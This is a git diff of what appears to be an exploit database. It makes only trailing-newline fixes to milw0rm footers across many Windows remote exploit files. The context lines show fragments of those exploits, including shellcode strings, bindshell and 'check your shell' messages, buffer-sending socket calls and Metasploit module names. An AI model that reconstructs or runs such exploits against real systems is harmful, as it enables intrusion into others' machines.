b/platforms/windows/remote/5315.py index 4ee021e46..cbf611022 100755 --- a/platforms/windows/remote/5315.py +++ b/platforms/windows/remote/5315.py @@ -69,4 +69,4 @@ print "[*] Sending evil packet, ph33r" s.sendto(muha, (host, port)) print "[*] Check port 4444 for bindshell" -# milw0rm.com [2008-03-26] +# milw0rm.com [2008-03-26] \ No newline at end of file diff --git a/platforms/windows/remote/5332.html b/platforms/windows/remote/5332.html index 2041e0b2c..941359462 100755 --- a/platforms/windows/remote/5332.html +++ b/platforms/windows/remote/5332.html @@ -127,4 +127,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/5338.html b/platforms/windows/remote/5338.html index 1b6be16d2..2b8b0a9bd 100755 --- a/platforms/windows/remote/5338.html +++ b/platforms/windows/remote/5338.html @@ -20,4 +20,4 @@ End Sub -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/5342.py b/platforms/windows/remote/5342.py index 74e4503fc..c7d79bc58 100755 --- a/platforms/windows/remote/5342.py +++ b/platforms/windows/remote/5342.py @@ -148,4 +148,4 @@ expl.close() print "[*] Egghunter working ..." print "[*] Check payload results - may take up to a minute." -# milw0rm.com [2008-04-02] +# milw0rm.com [2008-04-02] \ No newline at end of file diff --git a/platforms/windows/remote/5395.html b/platforms/windows/remote/5395.html index 63fc5e8c9..4751f84da 100755 --- a/platforms/windows/remote/5395.html +++ b/platforms/windows/remote/5395.html @@ -40,4 +40,4 @@ End Sub -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/windows/remote/5397.txt b/platforms/windows/remote/5397.txt index dda928bb6..44b7cf0d6 100755 --- a/platforms/windows/remote/5397.txt +++ b/platforms/windows/remote/5397.txt @@ -58,4 +58,4 @@ valid. I made a PoC using inline assembly and C. But it doesn't open to the public because of the vendor's request. (Just refer above descriptions.) -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/windows/remote/5398.html b/platforms/windows/remote/5398.html index ae736d83c..dd0b62c6d 100755 --- a/platforms/windows/remote/5398.html +++ b/platforms/windows/remote/5398.html @@ -128,4 +128,4 @@ Disclosure timeline: EOF --> -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/windows/remote/54.c b/platforms/windows/remote/54.c index 98ecc952a..6cd951f30 100755 --- a/platforms/windows/remote/54.c +++ b/platforms/windows/remote/54.c @@ -209,4 +209,4 @@ closesocket(listen_Sock); WSACleanup(); } -// milw0rm.com [2003-07-12] +// milw0rm.com [2003-07-12] \ No newline at end of file diff --git a/platforms/windows/remote/5416.html b/platforms/windows/remote/5416.html index 2a0ec8188..458107bdd 100755 --- a/platforms/windows/remote/5416.html +++ b/platforms/windows/remote/5416.html @@ -26,4 +26,4 @@ End Sub -# milw0rm.com [2008-04-09] +# milw0rm.com [2008-04-09] \ No newline at end of file diff --git a/platforms/windows/remote/5445.cpp b/platforms/windows/remote/5445.cpp index 41d00c2d6..fd74b47f3 100755 --- a/platforms/windows/remote/5445.cpp +++ b/platforms/windows/remote/5445.cpp @@ -680,4 +680,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2008-04-14] +// milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/windows/remote/5451.py b/platforms/windows/remote/5451.py index cc28cc3f5..e7c22e9e6 100755 --- a/platforms/windows/remote/5451.py +++ b/platforms/windows/remote/5451.py @@ -119,4 +119,4 @@ s.send('GET ' + evilbuf + "\n\n") s.close() print '[+] Done! Check your shell on %s:%d' % (HOST, PORT) -# milw0rm.com [2008-04-15] +# milw0rm.com [2008-04-15] \ No newline at end of file diff --git a/platforms/windows/remote/5461.rb b/platforms/windows/remote/5461.rb index 585d608fd..87c37a54d 100755 --- a/platforms/windows/remote/5461.rb +++ b/platforms/windows/remote/5461.rb @@ -177,4 +177,4 @@ class Exploits::Windows::Driver::Intel_Centrino_2200BG_driver_probe < Msf::Explo end end -# milw0rm.com [2008-04-17] +# milw0rm.com [2008-04-17] \ No newline at end of file diff --git a/platforms/windows/remote/5489.html b/platforms/windows/remote/5489.html index 5eb77fe62..c9788f50e 100755 --- a/platforms/windows/remote/5489.html +++ b/platforms/windows/remote/5489.html @@ -23,4 +23,4 @@ Concept"> -# milw0rm.com [2008-04-23] +# milw0rm.com [2008-04-23] \ No newline at end of file diff --git a/platforms/windows/remote/5496.html b/platforms/windows/remote/5496.html index ab8e45a04..3c45cfe24 100755 --- a/platforms/windows/remote/5496.html +++ b/platforms/windows/remote/5496.html @@ -51,4 +51,4 @@ Concept"> -# milw0rm.com [2008-04-25] +# milw0rm.com [2008-04-25] \ No newline at end of file diff --git a/platforms/windows/remote/5511.html b/platforms/windows/remote/5511.html index 7deef0f18..c4e95d78e 100755 --- a/platforms/windows/remote/5511.html +++ b/platforms/windows/remote/5511.html @@ -32,4 +32,4 @@ function Do_it() -# milw0rm.com [2008-04-27] +# milw0rm.com [2008-04-27] \ No newline at end of file diff --git a/platforms/windows/remote/5519.c b/platforms/windows/remote/5519.c index a1519f220..bd55028ba 100755 --- a/platforms/windows/remote/5519.c +++ b/platforms/windows/remote/5519.c @@ -205,4 +205,4 @@ void progressbar(void) return ; } -// milw0rm.com [2008-04-28] +// milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/platforms/windows/remote/5530.html b/platforms/windows/remote/5530.html index d84cebf2f..032589273 100755 --- a/platforms/windows/remote/5530.html +++ b/platforms/windows/remote/5530.html @@ -119,4 +119,4 @@ obj.WksPictureInterface = num; -# milw0rm.com [2008-05-02] +# milw0rm.com [2008-05-02] \ No newline at end of file diff --git a/platforms/windows/remote/5536.php b/platforms/windows/remote/5536.php index 0e4890478..8f64f0df2 100755 --- a/platforms/windows/remote/5536.php +++ b/platforms/windows/remote/5536.php @@ -96,4 +96,4 @@ $sock = @fsockopen($host, $port, $errno, $errstr, 10); } ?> -# milw0rm.com [2008-05-03] +# milw0rm.com [2008-05-03] \ No newline at end of file diff --git a/platforms/windows/remote/556.c b/platforms/windows/remote/556.c index 63ed8acc5..9807472f3 100755 --- a/platforms/windows/remote/556.c +++ b/platforms/windows/remote/556.c @@ -578,4 +578,4 @@ printf(" Exploit JPEG file %s has been generated!\n", jpeg_filename); return(EXIT_SUCCESS); } -// milw0rm.com [2004-09-27] +// milw0rm.com [2004-09-27] \ No newline at end of file diff --git a/platforms/windows/remote/5563.pl b/platforms/windows/remote/5563.pl index 8607ad1ca..81c26b030 100755 --- a/platforms/windows/remote/5563.pl +++ b/platforms/windows/remote/5563.pl @@ -109,4 +109,4 @@ $sock->send("\x00\x05" . $buffer, 0); print STDOUT "done.\n"; exit 0; -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/windows/remote/56.c b/platforms/windows/remote/56.c index ae0d507ad..ae99339f1 100755 --- a/platforms/windows/remote/56.c +++ b/platforms/windows/remote/56.c @@ -113,4 +113,4 @@ void main (int argc, char **argv) return; } -// milw0rm.com [2003-07-14] +// milw0rm.com [2003-07-14] \ No newline at end of file diff --git a/platforms/windows/remote/5612.html b/platforms/windows/remote/5612.html index 9f0759e7a..c2f917e3d 100755 --- a/platforms/windows/remote/5612.html +++ b/platforms/windows/remote/5612.html @@ -66,4 +66,4 @@ End Sub -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/windows/remote/5619.html b/platforms/windows/remote/5619.html index ce45379b5..b9fe523d6 100755 --- a/platforms/windows/remote/5619.html +++ b/platforms/windows/remote/5619.html @@ -55,4 +55,4 @@ Print me with table of links to execute calc.exe -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/windows/remote/566.pl b/platforms/windows/remote/566.pl index fe3ef86e8..74ad8e9f1 100755 --- a/platforms/windows/remote/566.pl +++ b/platforms/windows/remote/566.pl @@ -116,4 +116,4 @@ exit(1); } -# milw0rm.com [2004-10-04] +# milw0rm.com [2004-10-04] \ No newline at end of file diff --git a/platforms/windows/remote/568.c b/platforms/windows/remote/568.c index c209b37c8..f48249e1b 100755 --- a/platforms/windows/remote/568.c +++ b/platforms/windows/remote/568.c @@ -231,4 +231,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-10-06] +// milw0rm.com [2004-10-06] \ No newline at end of file diff --git a/platforms/windows/remote/5681.html b/platforms/windows/remote/5681.html index 0d7f5aad8..097ace375 100755 --- a/platforms/windows/remote/5681.html +++ b/platforms/windows/remote/5681.html @@ -173,4 +173,4 @@ obj1.cachefolder = buf; -# milw0rm.com [2008-05-27] +# milw0rm.com [2008-05-27] \ No newline at end of file diff --git a/platforms/windows/remote/5694.cpp b/platforms/windows/remote/5694.cpp index 901e8ca75..e474092f8 100755 --- a/platforms/windows/remote/5694.cpp +++ b/platforms/windows/remote/5694.cpp @@ -581,4 +581,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2008-05-29] +// milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/windows/remote/5695.cpp b/platforms/windows/remote/5695.cpp index 552ae3f7c..da64dadfe 100755 --- a/platforms/windows/remote/5695.cpp +++ b/platforms/windows/remote/5695.cpp @@ -771,4 +771,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2008-05-29] +// milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/windows/remote/572.pl b/platforms/windows/remote/572.pl index 09997002e..ba2a023d0 100755 --- a/platforms/windows/remote/572.pl +++ b/platforms/windows/remote/572.pl @@ -35,4 +35,4 @@ print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz--\n"; -# milw0rm.com [2004-10-11] +# milw0rm.com [2004-10-11] \ No newline at end of file diff --git a/platforms/windows/remote/573.c b/platforms/windows/remote/573.c index d9bcbf128..f2f77b658 100755 --- a/platforms/windows/remote/573.c +++ b/platforms/windows/remote/573.c @@ -185,4 +185,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-10-12] +// milw0rm.com [2004-10-12] \ No newline at end of file diff --git a/platforms/windows/remote/5732.html b/platforms/windows/remote/5732.html index 0de831cd8..4784fb24c 100755 --- a/platforms/windows/remote/5732.html +++ b/platforms/windows/remote/5732.html @@ -64,4 +64,4 @@ CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1"> -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/windows/remote/5738.rb b/platforms/windows/remote/5738.rb index 3b2d36279..8ef14b467 100755 --- a/platforms/windows/remote/5738.rb +++ b/platforms/windows/remote/5738.rb @@ -84,4 +84,4 @@ class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote end end -# milw0rm.com [2008-06-04] +# milw0rm.com [2008-06-04] \ No newline at end of file diff --git a/platforms/windows/remote/5741.html b/platforms/windows/remote/5741.html index b7beb42d4..a6357e67a 100755 --- a/platforms/windows/remote/5741.html +++ b/platforms/windows/remote/5741.html @@ -300,4 +300,4 @@ -# milw0rm.com [2008-06-04] +# milw0rm.com [2008-06-04] \ No newline at end of file diff --git a/platforms/windows/remote/5746.html b/platforms/windows/remote/5746.html index bda61f3e1..b28ae8601 100755 --- a/platforms/windows/remote/5746.html +++ b/platforms/windows/remote/5746.html @@ -82,4 +82,4 @@ } -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/windows/remote/5747.html b/platforms/windows/remote/5747.html index 1dcebed81..7776bf721 100755 --- a/platforms/windows/remote/5747.html +++ b/platforms/windows/remote/5747.html @@ -61,4 +61,4 @@ End Sub -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/windows/remote/5750.html b/platforms/windows/remote/5750.html index 4598f2c06..64efaf32b 100755 --- a/platforms/windows/remote/5750.html +++ b/platforms/windows/remote/5750.html @@ -45,4 +45,4 @@ End Sub -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/windows/remote/5751.pl b/platforms/windows/remote/5751.pl index 470ae98e4..d7768676f 100755 --- a/platforms/windows/remote/5751.pl +++ b/platforms/windows/remote/5751.pl @@ -140,4 +140,4 @@ my $sftp = $ssh2->sftp(); my $bad = $sftp->opendir($payload); exit; -# milw0rm.com [2008-06-06] +# milw0rm.com [2008-06-06] \ No newline at end of file diff --git a/platforms/windows/remote/577.c b/platforms/windows/remote/577.c index e6f697532..38b59f448 100755 --- a/platforms/windows/remote/577.c +++ b/platforms/windows/remote/577.c @@ -129,4 +129,4 @@ cout<<" ============================================================"< -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/windows/remote/5778.html b/platforms/windows/remote/5778.html index b80eb03c0..db937086e 100755 --- a/platforms/windows/remote/5778.html +++ b/platforms/windows/remote/5778.html @@ -65,4 +65,4 @@ End Sub -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/windows/remote/5793.html b/platforms/windows/remote/5793.html index 3caf3e883..5c4a0fc39 100755 --- a/platforms/windows/remote/5793.html +++ b/platforms/windows/remote/5793.html @@ -68,4 +68,4 @@ DXTTextOutEffect.FontSetting=buff; window.location.reload( true ); -# milw0rm.com [2008-06-12] +# milw0rm.com [2008-06-12] \ No newline at end of file diff --git a/platforms/windows/remote/5795.html b/platforms/windows/remote/5795.html index 608cce348..f8ece2386 100755 --- a/platforms/windows/remote/5795.html +++ b/platforms/windows/remote/5795.html @@ -32,4 +32,4 @@ -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/windows/remote/582.c b/platforms/windows/remote/582.c index 7720d40fc..ffafd3c90 100755 --- a/platforms/windows/remote/582.c +++ b/platforms/windows/remote/582.c @@ -112,4 +112,4 @@ void ver() printf ("################################################################\n"); } -// milw0rm.com [2004-10-18] +// milw0rm.com [2004-10-18] \ No newline at end of file diff --git a/platforms/windows/remote/5827.cpp b/platforms/windows/remote/5827.cpp index 906739abd..6f8eb800a 100755 --- a/platforms/windows/remote/5827.cpp +++ b/platforms/windows/remote/5827.cpp @@ -609,4 +609,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2008-06-15] +// milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/windows/remote/583.pl b/platforms/windows/remote/583.pl index 015442211..459edcf7a 100755 --- a/platforms/windows/remote/583.pl +++ b/platforms/windows/remote/583.pl @@ -76,4 +76,4 @@ if($data =~ /Received/) { $sock->shutdown(2); -# milw0rm.com [2004-10-18] +# milw0rm.com [2004-10-18] \ No newline at end of file diff --git a/platforms/windows/remote/588.py b/platforms/windows/remote/588.py index 32b20c2a5..5538f1d50 100755 --- a/platforms/windows/remote/588.py +++ b/platforms/windows/remote/588.py @@ -68,4 +68,4 @@ ftp.transfercmd("STOR " + buffer) except: print "\nDone." -# milw0rm.com [2004-10-21] +# milw0rm.com [2004-10-21] \ No newline at end of file diff --git a/platforms/windows/remote/589.html b/platforms/windows/remote/589.html index 3c0f0415a..0c3b6c4d5 100755 --- a/platforms/windows/remote/589.html +++ b/platforms/windows/remote/589.html @@ -9,4 +9,4 @@